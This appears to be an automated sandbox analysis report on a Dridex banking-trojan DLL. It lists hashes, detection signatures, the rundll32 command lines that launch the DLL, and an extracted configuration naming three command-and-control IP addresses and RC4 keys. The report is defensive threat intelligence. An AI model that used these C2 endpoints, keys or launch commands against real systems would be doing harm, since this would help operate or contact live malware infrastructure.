Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll
Analysis ID:	510694
MD5:	345eadc8b1f5d0b373b531902c06572e
SHA1:	a0a170c3bf53be55a625c7793bfe23edd4038f05
SHA256:	31bcae869dbae8bfd20fc177bf4158e75fc7fdf00c694ae13f23dff6229f8e8e
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Found detection on Joe Sandbox Cloud Basic with higher score

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Launches processes in debugging mode, may be used to hinder debugging

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 3104 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 4784 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6408 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6416 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll,FFRgpmdlwwWde MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5884 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',CheckTrust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6256 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5532 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 3192 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6488 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DownloadFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 3340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5356 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6552 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',GetICifFileFromFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000E.00000000.666915392.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000008.00000002.692811464.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000009.00000000.630165009.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.412312975.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000000.686620423.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000000.642318739.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000A.00000000.620992103.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000009.00000000.610084790.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000009.00000002.659636393.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000E.00000000.654050879.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000002.687730478.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000A.00000002.682477446.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000000.653718345.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000A.00000000.653774914.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000E.00000002.683460659.000000006E9E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
10.0.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.0.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
14.0.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
10.2.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
9.0.rundll32.exe.6e9e0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.2.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
14.2.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
10.0.rundll32.exe.6e9e0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.0.loaddll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
8.2.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
9.2.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
14.0.rundll32.exe.6e9e0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
9.0.rundll32.exe.6e9e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.0.rundll32.exe.6e9e0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 12.0.rundll32.exe.6e9e0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Virustotal: Detection: 22%			Perma Link
Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	ReversingLabs: Detection: 27%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Joe Sandbox ML: detected

Source: 12.0.rundll32.exe.3220000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 14.0.rundll32.exe.3a0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 9.2.rundll32.exe.3370000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.0.rundll32.exe.3220000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.9c4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.rundll32.exe.3370000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 8.2.rundll32.exe.6b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 10.0.rundll32.exe.30d4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.rundll32.exe.4c64756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.rundll32.exe.4f34756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.rundll32.exe.690000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.690000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 14.0.rundll32.exe.3a0000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 10.0.rundll32.exe.30d4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.rundll32.exe.920000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.2.rundll32.exe.3220000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 8.2.rundll32.exe.dd4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.rundll32.exe.9c4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.loaddll32.exe.2554756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.rundll32.exe.4c64756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.rundll32.exe.30d4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.rundll32.exe.8e4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.rundll32.exe.8e4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.rundll32.exe.b90000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 10.0.rundll32.exe.b90000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 4.2.rundll32.exe.b54756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.rundll32.exe.b90000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 14.2.rundll32.exe.3a0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 9.0.rundll32.exe.4f34756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.rundll32.exe.4f34756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.rundll32.exe.8e4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.rundll32.exe.3370000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.0.loaddll32.exe.3d0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.0.rundll32.exe.4c64756.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.392406274.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.601063055.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.392406274.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.601063055.000000004B280000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 149.202.179.100:443
Source: Malware configuration extractor	IPs: 66.147.235.11:6891
Source: Malware configuration extractor	IPs: 81.0.236.89:13786

Source: Joe Sandbox View	ASN Name: HOSTROCKETUS HOSTROCKETUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 66.147.235.11 66.147.235.11
Source: Joe Sandbox View	IP Address: 149.202.179.100 149.202.179.100
Source: Joe Sandbox View	IP Address: 81.0.236.89 81.0.236.89

Source: loaddll32.exe, 00000000.00000000.686735544.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.412402180.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.693068558.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.634648052.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.621361116.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.687762853.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.683488441.000000006E9FF000.00000002.00020000.sdmp

String found in binary or memory: http://www.vomfass.deDVarFileInfo$

Source: loaddll32.exe, 00000000.00000000.684965653.000000000098B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 10.0.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.rundll32.exe.6e9e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.rundll32.exe.6e9e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.rundll32.exe.6e9e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.rundll32.exe.6e9e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.rundll32.exe.6e9e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.666915392.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.692811464.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.630165009.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.412312975.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.686620423.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.642318739.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.620992103.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.610084790.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.659636393.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.654050879.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.687730478.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.682477446.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.653718345.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.653774914.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.683460659.000000006E9E1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score

Show sources

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Joe Sandbox Cloud Basic: Detection: malicious Score: 76 Threat Name: Dridex

Perma Link

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Binary or memory string: OriginalFilenameddlb.dll vs SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9F0754	4_2_6E9F0754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9F9348	4_2_6E9F9348
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9E1494	4_2_6E9E1494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9E846C	4_2_6E9E846C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9F1460	4_2_6E9F1460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9EA52C	4_2_6E9EA52C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9F1D58	4_2_6E9F1D58

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9F223C NtDelayExecution,	4_2_6E9F223C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9F2840 NtAllocateVirtualMemory,	4_2_6E9F2840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E9EBB88 NtClose,	4_2_6E9EBB88

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	Virustotal: Detection: 22%
Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	ReversingLabs: Detection: 27%

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll,FFRgpmdlwwWde

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll,FFRgpmdlwwWde
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',CheckTrust
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllCanUnloadNow
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DownloadFile
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',GetICifFileFromFile
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll,FFRgpmdlwwWde	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',CheckTrust	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DownloadFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',GetICifFileFromFile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3192
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6552
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6256
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6488

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2988.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@33/17@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Static file information: File size 1093632 > 1048576

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

